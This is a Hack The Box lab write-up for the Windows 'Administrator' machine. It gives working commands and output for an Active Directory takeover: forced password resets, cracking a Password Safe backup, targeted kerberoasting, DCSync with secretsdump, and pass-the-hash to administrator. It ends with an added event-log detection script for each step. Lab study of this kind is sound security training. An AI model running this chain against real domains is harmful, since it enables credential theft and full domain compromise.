Hack The Box / WINDOWS / 2024-11-16
Hack The Box — Administrator (Windows)
AD privilege chain from Olivia through delegated password resets, Password Safe credential recovery from FTP backup, targeted kerberoasting of ethan, and DCSync to administrator hash for final access.
Target
- IP: 10.129.36.59
Machine Information
From the Hack The Box machine description:
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Olivia / ichliebedich
Port Scan
sudo nmap -sC -sV 10.129.36.59 -p- -T5 -v
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-10 19:27:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
53460/tcp open msrpc Microsoft Windows RPC
64837/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
64842/tcp open msrpc Microsoft Windows RPC
64845/tcp open msrpc Microsoft Windows RPC
64862/tcp open msrpc Microsoft Windows RPC
64895/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 1d14h48m14s
| smb2-time:
| date: 2024-11-10T19:28:40
|_ start_date: N/A
Add administrator.htb to /etc/hosts.
Initial AD Enumeration
nxc smb administrator.htb -u Olivia -p ichliebedich --shares
SMB 10.129.36.59 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.36.59 445 DC [+] administrator.htb\Olivia:ichliebedich
SMB 10.129.36.59 445 DC [*] Enumerated shares
SMB 10.129.36.59 445 DC Share Permissions Remark
SMB 10.129.36.59 445 DC ----- ----------- ------
SMB 10.129.36.59 445 DC ADMIN$ Remote Admin
SMB 10.129.36.59 445 DC C$ Default share
SMB 10.129.36.59 445 DC IPC$ READ Remote IPC
SMB 10.129.36.59 445 DC NETLOGON READ Logon server share
SMB 10.129.36.59 445 DC SYSVOL READ Logon server share
enum4linux-ng administrator.htb
We notice:
FQDN: dc.administrator.htb
Add dc.administrator.htb to /etc/hosts.
bloodhound-python -u 'Olivia' -p 'ichliebedich' -ns 10.129.36.59 -d 'administrator.htb' -dc 'dc.administrator.htb' -c All --zip
sudo neo4j console
bloodhound --no-sandbox
Upload the zip into BloodHound.
Mark Olivia as owned.
We notice Olivia has a CanPsRemote relation to dc.administrator.htb.
evil-winrm -i administrator.htb -u 'Olivia' -p 'ichliebedich'
Try FTP:
ftp Olivia@administrator.htb
Enter Olivia's password.
It does not work.
ldapdomaindump administrator.htb -u 'administrator.htb\olivia' -p 'ichliebedich'
Open domain_computers.html.
There is only one computer: dc.
AD Abuse Chain: Olivia → michael → benjamin
From BloodHound, we note that Olivia has GenericAll over michael.
Download bloodyad:
- https://github.com/CravateRouge/bloodyAD.git
python3 bloodyAD/bloodyAD.py --host 'dc.administrator.htb' -d administrator.htb --dc-ip administrator.htb -u 'olivia' -p 'ichliebedich' set password 'michael' '!Kali12345678!'
[+] Password changed successfully!
nxc smb administrator.htb -u michael -p '!Kali12345678!'
SMB 10.129.36.59 445 DC [+] administrator.htb\michael:!Kali12345678!
From BloodHound, michael has ForceChangePassword over benjamin.
python3 bloodyAD/bloodyAD.py --host 'dc.administrator.htb' -d administrator.htb --dc-ip administrator.htb -u 'michael' -p '!Kali12345678!' set password 'benjamin' '!Kali12345678!'
nxc smb administrator.htb -u benjamin -p '!Kali12345678!'
SMB 10.129.36.59 445 DC [+] administrator.htb\benjamin:!Kali12345678!
benjamin is a member of the group ShareModerators.
FTP Backup and Password Safe
ftp benjamin@administrator.htb
Use password !Kali12345678!.
230 User logged in.
dir
10-05-24 08:13AM 952 Backup.psafe3
get Backup.psafe3
Then, on a shell on our machine:
file Backup.psafe3
Backup.psafe3: Password Safe V3 database
Note also that michael has CanPsRemote to dc.
evil-winrm -i administrator.htb -u 'michael' -p '!Kali12345678!'
Crack the Password Safe database:
pwsafe2john Backup.psafe3 > test.out
john --wordlist=/usr/share/wordlists/rockyou.txt ./test.out
Recovered password:
tekieromucho (Backu)
Open the database:
pwsafe -s Backup.psafe3
Enter recovered password.
We find these credentials:
alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur
Access as emily and Attack ethan
nxc smb administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
SMB 10.129.36.59 445 DC [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
evil-winrm -i administrator.htb -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
From BloodHound, emily has GenericWrite over ethan.
Attempted password set:
python3 bloodyAD/bloodyAD.py --host 'dc.administrator.htb' -d administrator.htb --dc-ip administrator.htb -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' set password 'ethan' '!Kali12345678!'
This does not work: GenericWrite lets emily modify attributes on ethan's object, but it does not include the reset-password right that ForceChangePassword or GenericAll would give.
Try shadow credentials with PyWhisker:
git clone https://github.com/ShutdownRepo/pywhisker.git
cd pywhisker
git checkout c4ecf411a585ca4647843c8c3856e023e738a528
cd ..
python3 pywhisker/pywhisker.py -d "administrator.htb" -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" --target "ethan" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 9c47ffbd-1730-7379-f7e6-3b55fb562751
[*] Updating the msDS-KeyCredentialLink attribute of ethan
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: 5QGP2Bz0.pfx
[*] Must be used with password: FLX4fZw0YqeQel1masUr
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
certipy cert -export -pfx 5QGP2Bz0.pfx -password FLX4fZw0YqeQel1masUr -out "unprotected.pfx"
certipy auth -pfx unprotected.pfx -dc-ip 10.129.36.59 -username 'ethan' -domain 'administrator.htb'
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
So this approach does not work.
Download PKINITtools:
- https://github.com/dirkjanm/PKINITtools.git
python3 PKINITtools/gettgtpkinit.py -cert-pfx 5QGP2Bz0.pfx -pfx-pass 'FLX4fZw0YqeQel1masUr' -dc-ip administrator.htb 'administrator.htb/ethan' out.ccache
Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)"
We get the same error. KDC_ERR_PADATA_TYPE_NOSUPP means this KDC does not support PKINIT (no usable DC certificate), so the shadow credential cannot be turned into a TGT here.
Targeted Kerberoast and Password Crack
Get shell as emily again:
evil-winrm -i administrator.htb -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
Download PowerView and upload to target:
- https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
. .\PowerView.ps1
Set-DomainObject -Identity ethan -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
Get-DomainUser ethan -SPN | Get-DomainSPNTicket -Format Hashcat
This does not work.
Download targetedKerberoast:
- https://github.com/ShutdownRepo/targetedKerberoast
Synchronise our clock with the DC first (the scan reported a skew of over a day, which Kerberos rejects):
sudo ntpdate administrator.htb
python3 targetedKerberoast/targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$5b038ca9e3deb262cfb2d49e4e7fb6dc$...
Save it to a file named hash and crack it:
hashcat -a 0 ./hash ./rockyou.txt
Recovered password:
limpbizkit
nxc smb administrator.htb -u ethan -p limpbizkit
SMB 10.129.36.59 445 DC [+] administrator.htb\ethan:limpbizkit
From BloodHound, ethan has DCSync over administrator.htb.
secretsdump.py 'administrator.htb'/'ethan':'limpbizkit'@'dc.administrator.htb'
We obtain:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Final access:
evil-winrm -i administrator.htb -u administrator -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
We get a shell as administrator.
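A detection-side companion to the chain above, added here as an example and not part of the original writeup: rules that flag the delegated password resets (4724), the SPN written onto ethan (5136), the RC4 service-ticket request that yields the roastable hash (4769) and the DCSync by ethan (4662). It assumes Windows Security events already parsed into flat dicts, that DC$ is the only account allowed to replicate, and uses constructed sample events.

```python
# Added detection example (not part of the original writeup): flag each step of the
# Administrator chain in Windows Security log events. Event shapes are simplified
# dicts; the sample events below are constructed, not captured logs.
from typing import Dict, List

# Extended rights a DCSync exercises on the domain object (real rightsGuid values).
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dca4",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dca4",  # DS-Replication-Get-Changes-All
}
REPLICATION_ALLOWED = {"DC$"}  # assumption: the single DC seen in the writeup

def detect(events: List[Dict[str, str]]) -> List[str]:
    """Return one alert string per suspicious event, in input order."""
    alerts = []
    for e in events:
        eid, who = e.get("EventID"), e.get("SubjectUserName", "")
        if eid == "4724":  # password reset on another account (GenericAll/ForceChangePassword)
            alerts.append(f"reset:{who}->{e['TargetUserName']}")
        elif eid == "5136" and e.get("AttributeLDAPDisplayName") == "servicePrincipalName":
            alerts.append(f"spn-write:{who}->{e['ObjectDN']}")  # targeted kerberoast setup
        elif eid == "4769" and e.get("TicketEncryptionType") == "0x17" \
                and not e.get("ServiceName", "").endswith("$"):
            # RC4 service ticket for a user (non-machine) SPN: the roastable ticket
            alerts.append(f"rc4-tgs:{e['TargetUserName']}->{e['ServiceName']}")
        elif eid == "4662" and who not in REPLICATION_ALLOWED:
            props = {p.strip("{}") for p in e.get("Properties", "").split()}
            if props & REPL_GUIDS:
                alerts.append(f"dcsync:{who}")
    return alerts

SAMPLE = [  # constructed events mirroring the chain in this writeup
    {"EventID": "4724", "SubjectUserName": "olivia", "TargetUserName": "michael"},
    {"EventID": "4724", "SubjectUserName": "michael", "TargetUserName": "benjamin"},
    {"EventID": "5136", "SubjectUserName": "emily", "AttributeLDAPDisplayName": "servicePrincipalName",
     "ObjectDN": "CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb"},
    {"EventID": "4769", "TargetUserName": "emily@ADMINISTRATOR.HTB", "ServiceName": "ethan",
     "TicketEncryptionType": "0x17"},
    {"EventID": "4769", "TargetUserName": "emily@ADMINISTRATOR.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12"},  # AES ticket for a machine account: benign
    {"EventID": "4662", "SubjectUserName": "ethan",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dca4} {1131f6ad-9c07-11d1-f79f-00c04fc2dca4}"},
    {"EventID": "4662", "SubjectUserName": "DC$", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dca4}"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

Only the five attacker-driven events produce alerts; the AES machine-account ticket and the DC's own replication request pass silently.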